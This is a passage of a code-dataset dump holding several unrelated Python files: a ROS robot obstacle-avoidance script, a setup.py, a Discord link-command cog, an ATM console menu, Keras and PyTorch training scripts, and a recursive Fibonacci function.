self.test_devant():\n\t\t\t\tstop=True\n\t\t\telif self.vitesse < 0 and self.test_derriere():\n\t\t\t\tstop=True\n\t\t\tif stop:\n\t\t\t\tloginfo(\"EMERGENCY\")\n\t\t\t\tself.move(0,0)\n\n\tdef on_state(self, msg):\n\t\tself.motor_state = msg.control\n\n\tdef command(self):\n\n\t\tif self.test_devant():\n\t\t\tself.count = self.count + 1\n\t\t\tif self.count > MAXROTATION:\n\t\t\t\tself.rand = randrange(0,2,1)\n\t\t\t\tself.count = 0\n\t\t\tif self.rand == 0: \n\t\t\t\tself.rand = -1\n\t\t\t\tloginfo(\"Obstacle: turning right\")\n\t\t\telse:\n\t\t\t\tloginfo(\"Obstacle: turning left\")\n\t\t\tself.move(0,ROTATION * self.rand)\n\t\telse:\n\t\t\tself.count = MAXROTATION\n\t\t\tself.vitesse = VITESSEMAX\n\t\t\td = self.dist_devant()\n\t\t\tif d < MINUSFRONT: self.vitesse=0\n\t\t\telif d < 300:\n\t\t\t\tx = d / SPEEDRATE\t# in m/s, max 1 m/s\n\t\t\t\tif self.vitesse > x: \n\t\t\t\t\tself.vitesse = x\n\t\t\tloginfo(\"Moving forward at %.2f %d\"%(self.vitesse,d))\n\t\t\tself.move(self.vitesse,0)\n\n\tdef move(self,x,z):\n\t\tvelmsg = Twist()\n\t\tvelmsg.linear.x = x\n\t\tvelmsg.angular.z = z\n\t\tself.vitesse = x\n\t\tself.cmdvel.publish(velmsg)\n\n\tdef dist_devant(self):\n\t\tres = min(self.proximity[US_FRONTRIGHT],self.proximity[US_FRONTLEFT])\n\t\tres = min(res,self.proximity[US_SIDERIGHT])\n\t\tres = min(res,self.proximity[US_SIDELEFT])\n\t\treturn res\n\n\tdef test_devant(self):\n\t\tif self.proximity[IR_RIGHT] > MAXIR or self.proximity[IR_LEFT] > MAXIR:\n\t\t\treturn True\n\t\tif self.proximity[US_FRONTRIGHT] < MINUSFRONT or self.proximity[US_FRONTLEFT] < MINUSFRONT:\n\t\t\treturn True\n\t\tif self.proximity[US_SIDERIGHT] < MINUSSIDE or self.proximity[US_SIDELEFT] < MINUSSIDE:\n\t\t\treturn True\n\t\treturn False\n\n\tdef test_derriere(self):\n\t\t# test_derriere is called by on_proximity but was never defined in the original file;\n\t\t# this is an assumed minimal check of the rear ultrasonic sensors using the front threshold\n\t\tif self.proximity[US_BACKLEFTB] < MINUSFRONT or self.proximity[US_BACKRIGHTB] < MINUSFRONT:\n\t\t\treturn True\n\t\treturn False\n\n\tdef stop(self):\n\t\tloginfo(\"Stop Robot\")\n\t\tself.cmdstop.publish(10)\n\n\tdef test(self):\n\t\tloginfo(\"Test Robot\")\n\t\tvelmsg = Twist()\n\t\tvelmsg.linear.x = 0.5\n\t\tvelmsg.angular.z = 0\n\t\tself.cmdvel.publish(velmsg)\n\ndef loginfo(str):\n\trospy.loginfo(\"%s %s\",datetime.datetime.strftime(datetime.datetime.now(),\"%Y-%m-%d %H:%M:%S\"),str)\n\t#rospy.loginfo(\"%s %s\",datetime.datetime.now(),str)\n\nif __name__ == \"__main__\":\n\n\trospy.init_node(\"robot_route\")\n\trobot = Robot_route()\n\n\tloginfo(\"Route: waiting for the motor service ...\")\n\trospy.wait_for_service(\"motor_control\")\n\tmotor_srv = rospy.ServiceProxy(\"motor_control\",MotorSrv)\n\n\tloginfo(\"Route: waiting for motor ON ...\")\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown() and not robot.motor_state:\n\t\trate.sleep()\n\n#\trobot.test()\n#\trospy.spin()\n\n\tloginfo(\"Route: waiting for sensors ON ...\")\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown() and robot.proximity[0] == 0.0:\n\t\trate.sleep()\n\ttime.sleep(1)\n\n\tloginfo(\"Route: initializing the motor\")\n\ttry:\n\t\tres = motor_srv(True,ACCELERATION,True,True)\n\t\tif res.result != 1:\n\t\t\tloginfo(\"Route: acceleration initialization error: %s\"%res)\n\t\telse:\n\t\t\trospy.on_shutdown(robot.stop)\n\t\t\trate = rospy.Rate(10)\n\t\t\twhile not rospy.is_shutdown():\n\t\t\t\tif robot.motor_state: robot.command()\n\t\t\t\trate.sleep()\n\n\texcept rospy.ServiceException as exc:\n\t\tloginfo(\"Route: motor service error: %s\"%exc)\n\n\n\n\n\n\n","sub_path":"decawave_driver/ubo_pkg/scripts/robot_route.py","file_name":"robot_route.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"316164132","text":"import setuptools\nimport os\nimport shutil\n\n\nsetuptools.setup(\n    name=\"Original Sin'S Server\",\n    version=\"2.0.1\",\n    author=\"NutShellBox\",\n    author_email=\"nutshellbox.public@gmail.com\",\n    description=\"Original Sin's Server Script\",\n    url=\"https://www.arheneos.com\",\n    packages=setuptools.find_packages(),\n    install_requires=[\n        \"Flask>=1.0.2, <2\",\n        \"pymongo>=3.6.0\",\n        \"imageio>=2.3.0\",\n        \"scipy>=1.1.0\",\n        
\"markdown2==2.3.5\",\n \"gevent>=1.3.0\",\n \"bs4>=0.0.1\",\n \"psutil>=5.4.0\",\n \"Flask-Login==0.4.1\",\n ],\n scripts=['sin_server.py']\n)\n\nprint(\"Installing Datafiles ... \")\nstatic_folder_items = [\"templates\", \"img\", \"js\", \"css\", \"webfonts\"]\nif not os.path.exists(\"/media/\"):\n os.mkdir(\"/media\")\n\nfor r in static_folder_items:\n if os.path.exists(\"/media/{}\".format(r)):\n shutil.rmtree(\"/media/{}\".format(r))\n shutil.copytree(r, \"/media/{}\".format(r))\n print(f\"{os.getcwd() + '/'} -> {'/media/'}\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221742964","text":"import discord\nimport config\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\n\nclass Links(Cog):\n \"\"\"\n Commands for easily linking to projects.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(hidden=True)\n async def pegaswitch(self, ctx):\n \"\"\"Link to the Pegaswitch repo\"\"\"\n await ctx.send(\"https://github.com/reswitched/pegaswitch\")\n\n @commands.command(hidden=True, aliases=[\"atmos\"])\n async def atmosphere(self, ctx):\n \"\"\"Link to the Atmosphere repo\"\"\"\n await ctx.send(\"https://github.com/atmosphere-nx/atmosphere\")\n\n @commands.command(hidden=True, aliases=[\"xyproblem\"])\n async def xy(self, ctx):\n \"\"\"Link to the \"What is the XY problem?\" post from SE\"\"\"\n await ctx.send(\"\\n\\n\"\n \"TL;DR: It's asking about your attempted solution \"\n \"rather than your actual problem.\\n\"\n \"It's perfectly okay to want to learn about a \"\n \"solution, but please be clear about your intentions \"\n \"if you're not actually trying to solve a problem.\")\n\n @commands.command(hidden=True, aliases=[\"guides\", \"link\"])\n async def guide(self, ctx):\n \"\"\"Link to the guide(s)\"\"\"\n\n message_text=(\"**Generic starter guides:**\\n\"\n \"AtlasNX's Guide: \"\n \"\\n\"\n \"\\n\"\n \"**Specific guides:**\\n\"\n \"Manually Updating/Downgrading (with HOS): \"\n \"\\n\"\n \"Manually Repairing/Downgrading (without HOS): \"\n \"\\n\"\n \"Setting up EmuMMC (Windows): \"\n \"\\n\"\n \"Setting up EmuMMC (Linux): \"\n \"\\n\"\n \"Setting up EmuMMC (Mac): \"\n \"\\n\"\n \"How to get started developing Homebrew: \"\n \"\\n\"\n \"\\n\")\n\n try:\n support_faq_channel = self.bot.get_channel(config.support_faq_channel)\n if support_faq_channel is None:\n message_text += \"Check out #support-faq for additional help.\"\n else:\n message_text += f\"Check out {support_faq_channel.mention} for additional help.\"\n except AttributeError:\n message_text += \"Check out #support-faq for additional help.\"\n \n await ctx.send(message_text)\n\n @commands.command(hidden=True, aliases=[\"patron\"])\n async def patreon(self, ctx):\n \"\"\"Link to the patreon\"\"\"\n await ctx.send(\"https://patreon.teamatlasnx.com\")\n\n @commands.command(hidden=True, aliases=[\"coffee\"])\n async def kofi(self, ctx):\n \"\"\"Link to Ko-fi\"\"\"\n await ctx.send(\"https://kofi.teamatlasnx.com\")\n\n @commands.command(hidden=True, aliases=[\"sdfiles\"])\n async def kosmos(self, ctx):\n \"\"\"Link to the latest Kosmos release\"\"\"\n await ctx.send(\"https://github.com/AtlasNX/Kosmos/releases/latest\")\n\n @commands.command(hidden=True, aliases=[\"sd\"])\n async def sdsetup(self, ctx):\n \"\"\"Link to SD Setup\"\"\"\n await ctx.send(\"https://sdsetup.com\")\n\n @commands.command()\n async def source(self, ctx):\n 
\"\"\"Gives link to source code.\"\"\"\n await ctx.send(f\"You can find my source at {config.source_url}. \"\n \"Serious PRs and issues welcome!\")\n\ndef setup(bot):\n bot.add_cog(Links(bot))\n","sub_path":"cogs/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290968424","text":"#liuhao\n'''\n主逻辑交互程序\n'''\nimport os,sys\nBASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nfrom core import transaction\nfrom core.auth import *\n@auth\ndef welcome():\n print('welcome to bank')\ndef run():\n account_id=welcome()\n dic={\n '1':transaction.withdrawals,\n '2':transaction.refund,\n '3':transaction.transfer,\n '4':transaction.query\n }\n while True:\n print('''\n 1. 取现\n 2. 还款\n 3. 转账\n 4. 查询\n 退出【任意键】\n ''')\n choice=input(\">>\").strip()\n if choice in dic:\n dic[choice](account_id)\n else:\n return\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"day4/atm+购物商城作业/ATM/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"482755184","text":"# coding: utf-8\n\n# import the necessary packages\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.image import img_to_array\nfrom keras.utils import to_categorical\nfrom imutils import paths\nimport matplotlib.pyplot as plt\n# import matplotlib\n# matplotlib.use(\"Agg\")\n# import numpy as np\n# import argparse\nimport random\nimport cv2\nimport os\nimport keras\nimport sys\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras import regularizers\nimport scipy.io as scio\n\n# coding=utf-8\nfrom keras.models import Model\nfrom keras.layers import Input, Dense, BatchNormalization, Conv2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D,LSTM, CuDNNLSTM\nfrom keras.layers import add, Flatten\n# from keras.layers.convolutional import Conv2D,MaxPooling2D,AveragePooling2D\nfrom keras.optimizers import SGD\nimport numpy as np\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.callbacks import TensorBoard\nfrom keras import backend as K\nfrom keras.layers import Conv2D,MaxPool2D\nfrom keras.regularizers import l2\n\nclass MODEL:\n def Vgg(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n model = Sequential(name='vgg16-sequential')\n input_shape=(width,height,depth)\n # 第1个卷积区块(block1)\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu', input_shape=input_shape, name='block1_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu', name='block1_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block1_pool'))\n\n # 第2个卷积区块(block2)\n model.add(Conv2D(128, (3, 3), padding='same', activation='relu', name='block2_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(128, (3, 3), padding='same', activation='relu', name='block2_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block2_pool'))\n\n # 第3个区块(block3)\n model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n 
model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(MaxPool2D((2, 2), strides=(2, 2), name='block3_pool'))\n\n        # 4th block (block4)\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(MaxPool2D((2, 2), strides=(2, 2), name='block4_pool'))\n\n        # 5th block (block5)\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(MaxPool2D((2, 2), strides=(2, 2), name='block5_pool'))\n\n\n        # feed-forward fully connected block\n        model.add(Flatten(name='flatten'))\n        model.add(Dense(4096, activation='relu', name='fc1'))\n        model.add(Dense(4096, activation='relu', name='fc2'))\n        model.add(Dense(classNum, activation='softmax', name='predictions'))\n\n        return model\n\n    def Lenet(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n        # initialize the model\n        model = Sequential()\n        inputShape = (height, width, depth)\n        # if we are using \"channels last\", update the input shape\n        if K.image_data_format() == \"channels_first\": #for tensorflow\n            inputShape = (depth, height, width)\n        # stage 1\n        model.add(Conv2D(20, (3, 3),padding=\"same\",input_shape=inputShape,kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(20, (3,3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(20, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n        # model.add(AveragePooling2D(pool_size=(2, 2), strides=(2, 2)))\n        # stage 2\n        model.add(Conv2D(50, (3, 3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(50, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(50, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(MaxPooling2D(pool_size=(3, 3), strides=(3, 3)))\n\n\n        model.add(Conv2D(50, (1, 3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(50, (1, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(Conv2D(50, (1, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n        model.add(Activation(\"relu\"))\n        model.add(MaxPooling2D(pool_size=(3, 3), strides=(3, 3)))\n        # model.add(AveragePooling2D(pool_size=(2, 2), strides=(2, 2)))\n        # stage 3\n        model.add(Flatten())\n        model.add(Dense(100))\n        model.add(Activation(\"relu\"))\n        
model.add(Dropout(0.9))\n\n        # softmax classifier\n        model.add(Dense(classNum))\n        model.add(Activation(\"sigmoid\"))\n\n        # return the constructed model\n        return model\n    def LSTM(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n        model = Sequential()\n        # model.add(LSTM(128, input_shape = (height, width)))\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\"\n                         ,input_shape = (height, width, depth)))\n        model.add(BatchNormalization())\n\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        model.add(Conv2D(filters=4, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n        model.add(BatchNormalization())\n        # model.add(MaxPooling2D(pool_size=(3, 3)))\n\n        model.add(Flatten())\n\n        model.add(Dense(32, activation=\"relu\"))\n        model.add(Dropout(0.5))\n        model.add(BatchNormalization())\n        # model.add(Dropout(0.2))\n        model.add(Dense(classNum, activation=\"sigmoid\"))\n        return model\n    # adam = Adam(lr=0.001)\n    # model.compile(optimizer=adam, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n    # model.summary()\n\ndef load_data(path):\n    print(path)\n    labels_list=os.listdir(path);\n    labels_list.sort();\n    print(\"[INFO] loading images...\")\n    data = []\n    labels = []\n    # grab the image paths and randomly shuffle them\n    imagePaths = sorted(list(paths.list_images(path)))\n    # print(imagePaths)\n    random.seed(42)\n    random.shuffle(imagePaths)\n    # loop over the input images\n    for imagePath in imagePaths:\n        # load the image, pre-process it, and store it in the data list\n        # print(imagePath)\n        image = cv2.imread(imagePath)\n        image = cv2.resize(image, (norm_size, norm_size))\n        image = img_to_array(image)\n        data.append(image)\n\n        # extract the class label from the image path and update the\n        # labels list\n        # print(imagePath.split(os.path.sep)[-2])\n        label = labels_list.index(imagePath.split(os.path.sep)[-2])\n        labels.append(label)\n\n    # scale the raw pixel intensities to the range [0, 1]\n    data = np.array(data, dtype=\"float\") / 255.0\n    labels = np.array(labels)\n\n    # convert the labels from integers to vectors\n    labels = to_categorical(labels, num_classes=CLASS_NUM)\n    return data, labels\n\ndef load_matData(path):\n    labels_list = os.listdir(path);\n    labels_list.sort();\n    print(\"[INFO] loading images...\")\n    data = []\n    labels = []\n\n    imagePaths = sorted(list(paths.list_files(path)))\n    random.seed(0)\n    random.shuffle(imagePaths)\n\n    # loop over the input images\n    for imagePath in imagePaths:\n        # load the image, pre-process it, and store it in the data list\n        # print(imagePath)\n        image=scio.loadmat(imagePath)\n        keys=list(image.keys())\n        # print(type(image[keys[3]]))\n        image=image[keys[3]]\n        image=image.reshape(image.shape+(1,))\n        data.append(image)\n\n        # extract the class label from the image path and update the\n        # labels list\n        label = labels_list.index(imagePath.split(os.path.sep)[-2])\n        labels.append(label)\n        # print(labels)\n\n    # scale the raw pixel intensities to the range [0, 1]\n    data = np.array(data, dtype=\"float\")\n    data=(data-np.mean(data))/np.std(data)\n    labels = np.array(labels)\n\n    # convert the labels from integers to vectors\n    labels = to_categorical(labels, num_classes=CLASS_NUM)\n    return data, labels\n\n\n\n\n\ndef train(aug, trainX, trainY, testX, testY):\n    #CLASS_NUM\n    # initialize the model\n    print(\"[INFO] compiling model...\")\n    # model = MODEL.Vgg(norm_size,norm_size,depth,0.0005,classNum=CLASS_NUM)\n    model = MODEL.LSTM(61, 700, depth, 0, classNum=CLASS_NUM)\n    model.summary()\n    # model= keras.models.load_model('ResNet50.hdf5')\n    adam = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\n    # sgd = SGD(decay=0.0001, momentum=0.9)\n    # model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n    model.compile(loss=\"categorical_crossentropy\", optimizer=adam, metrics=[\"accuracy\"])\n\n    # train the network\n    print(\"[INFO] training network...\")\n    model_checkpoint = ModelCheckpoint('Vgg.hdf5', monitor='val_acc', verbose=1, save_best_only=True)\n    tb_cb = keras.callbacks.TensorBoard(log_dir=\"./log\", write_images=1, histogram_freq=0)\n    # Set the log directory; write the network weights as images for TensorBoard,\n    # and record the weights and per-layer output histograms once per epoch\n    H = model.fit_generator(aug.flow(trainX, trainY, batch_size=BS),callbacks=[model_checkpoint,tb_cb],\n                            validation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n                            epochs=EPOCHS)\n    # H=model.fit(trainX, trainY,batch_size=BS,callbacks=[model_checkpoint,tb_cb],\n    #             validation_data=(testX, testY),\n    #             epochs=EPOCHS)\n    # save the model to disk\n    print(\"[INFO] serializing network...\")\n    model.save(\".//lasted.model\")\n\n    # plot the training loss and accuracy\n    plt.style.use(\"ggplot\")\n    plt.figure()\n    N = EPOCHS\n    plt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\n    plt.plot(np.arange(0, N), H.history[\"val_loss\"], label=\"val_loss\")\n    plt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\n    plt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\n    plt.title(\"Training Loss and Accuracy on foot classifier\")\n    plt.xlabel(\"Epoch #\")\n    plt.ylabel(\"Loss/Accuracy\")\n    plt.legend(loc=\"lower left\")\n    plt.savefig(\"train.png\")\n\n\nCLASS_NUM=0\nEPOCHS = 500\nINIT_LR = 1e-4\nBS = 16\n# norm_size = 128\ndepth=1\n\nif __name__ == '__main__':\n    train_file_path = \"D:\\data\\\\naodian\\classes4\";\n    # test_file_path = \"./val\"\n    CLASS_NUM = len(os.listdir(train_file_path))\n    # print(CLASS_NUM)\n    allX, allY = load_matData(train_file_path)\n    rate=int(len(allX)*0.7)\n\n    trainX, trainY=allX[:rate,:,:],allY[:rate,:]\n    testX, testY = allX[rate:, :, :], allY[rate:, :]\n\n\n    # testX, testY = load_data(test_file_path)\n    # construct the image generator for data augmentation\n\n    aug = ImageDataGenerator()\n    print(trainX.shape)\n    train(aug, trainX, trainY, testX, testY)\n\n\n\n\n\n\n","sub_path":"python/20190808/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"250287984","text":"def fib(i):\n    if i < 0:\n        # fail loudly on invalid input instead of printing and implicitly returning None\n        raise ValueError(\"invalid input\")\n    elif i == 0:\n        return 0\n    elif i == 1:\n        return 1\n    else:\n        return fib(i-1)+fib(i-2)\n\n\nn = int(input(\"enter no of elements\"))\nfor i in range(n+1):\n    print(fib(i))\n","sub_path":"fibonaccirecurtion.py","file_name":"fibonaccirecurtion.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"372354989","text":"import argparse\nimport json\nimport logging\nimport os\nimport sys\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nfrom torchvision import datasets, transforms\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\n\nclass Net(nn.Module):\n    # Based on https://github.com/pytorch/examples/blob/master/mnist/main.py\n    def __init__(self):\n        logger.info(\"Create neural network module\")\n\n        super(Net, self).__init__()\n        self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n        self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n        self.conv2_drop = nn.Dropout2d()\n        self.fc1 = nn.Linear(320, 50)\n        self.fc2 = nn.Linear(50, 10)\n\n    def forward(self, x):\n        x = F.relu(F.max_pool2d(self.conv1(x), 2))\n        x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n        x = x.view(-1, 320)\n        x = F.relu(self.fc1(x))\n        x = F.dropout(x, training=self.training)\n        x = self.fc2(x)\n        return F.log_softmax(x, dim=1)\n\n\ndef _get_train_data_loader(training_dir, is_distributed, batch_size, **kwargs):\n    logger.info(\"Get train data loader\")\n    dataset = datasets.MNIST(\n        training_dir,\n        train=True,\n        transform=transforms.Compose(\n            [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]\n        ),\n        download=False,  # True sets a dependency on an external site for our canaries.\n    )\n    train_sampler = (\n        torch.utils.data.distributed.DistributedSampler(dataset) if is_distributed else None\n    )\n    train_loader = torch.utils.data.DataLoader(\n        dataset,\n        batch_size=batch_size,\n        shuffle=train_sampler is None,\n        sampler=train_sampler,\n        **kwargs\n    )\n    return train_sampler, train_loader\n\n\ndef _get_test_data_loader(training_dir, **kwargs):\n    logger.info(\"Get test data loader\")\n    return torch.utils.data.DataLoader(\n        datasets.MNIST(\n            training_dir,\n            train=False,\n            transform=transforms.Compose(\n                [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]\n            ),\n            download=False,  # True sets a dependency on an external site for our canaries.\n        ),\n        batch_size=1000,\n        shuffle=True,\n        **kwargs\n    )\n\n\ndef _average_gradients(model):\n    # Gradient averaging.\n    size = float(dist.get_world_size())\n    for param in model.parameters():\n        dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)\n        param.grad.data /= size\n\n\ndef train(args):\n    world_size = len(args.hosts)\n    is_distributed = world_size > 1\n    logger.debug(\"Number of hosts {}. 
Distributed training - {}\".format(world_size, is_distributed))\n use_cuda = args.num_gpus > 0\n logger.debug(\"Number of gpus available - {}\".format(args.num_gpus))\n kwargs = {\"num_workers\": 1, \"pin_memory\": True} if use_cuda else {}\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n if is_distributed:\n # Initialize the distributed environment.\n backend = \"gloo\"\n os.environ[\"WORLD_SIZE\"] = str(world_size)\n host_rank = args.hosts.index(args.current_host)\n dist.init_process_group(backend=backend, rank=host_rank, world_size=world_size)\n logger.info(\n \"Initialized the distributed environment: '{}' backend on {} nodes. \".format(\n backend, dist.get_world_size()\n )\n + \"Current host rank is {}. Is cuda available: {}. Number of gpus: {}\".format(\n dist.get_rank(), torch.cuda.is_available(), args.num_gpus\n )\n )\n\n # set the seed for generating random numbers\n seed = 1\n torch.manual_seed(seed)\n if use_cuda:\n torch.cuda.manual_seed(seed)\n\n train_sampler, train_loader = _get_train_data_loader(\n args.data_dir, is_distributed, args.batch_size, **kwargs\n )\n test_loader = _get_test_data_loader(args.data_dir, **kwargs)\n\n logger.debug(\n \"Processes {}/{} ({:.0f}%) of train data\".format(\n len(train_loader.sampler),\n len(train_loader.dataset),\n 100.0 * len(train_loader.sampler) / len(train_loader.dataset),\n )\n )\n\n logger.debug(\n \"Processes {}/{} ({:.0f}%) of test data\".format(\n len(test_loader.sampler),\n len(test_loader.dataset),\n 100.0 * len(test_loader.sampler) / len(test_loader.dataset),\n )\n )\n\n model = Net().to(device)\n if is_distributed and use_cuda:\n # multi-machine multi-gpu case\n logger.debug(\"Multi-machine multi-gpu: using DistributedDataParallel.\")\n model = torch.nn.parallel.DistributedDataParallel(model)\n elif use_cuda:\n # single-machine multi-gpu case\n logger.debug(\"Single-machine multi-gpu: using DataParallel().cuda().\")\n model = torch.nn.DataParallel(model)\n else:\n # single-machine or multi-machine cpu case\n logger.debug(\"Single-machine/multi-machine cpu: using DataParallel.\")\n model = torch.nn.DataParallel(model)\n\n optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.5)\n\n log_interval = 100\n for epoch in range(1, args.epochs + 1):\n if is_distributed:\n train_sampler.set_epoch(epoch)\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader, 1):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n if is_distributed and not use_cuda:\n # average gradients manually for multi-machine cpu case only\n _average_gradients(model)\n optimizer.step()\n if batch_idx % log_interval == 0:\n logger.debug(\n \"Train Epoch: {} [{}/{} ({:.0f}%)] Loss: {:.6f}\".format(\n epoch,\n batch_idx * len(data),\n len(train_loader.sampler),\n 100.0 * batch_idx / len(train_loader),\n loss.item(),\n )\n )\n accuracy = test(model, test_loader, device)\n save_model(model, args.model_dir)\n\n logger.debug(\"Overall test accuracy: {};\".format(accuracy))\n\n\ndef test(model, test_loader, device):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, size_average=False).item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= 
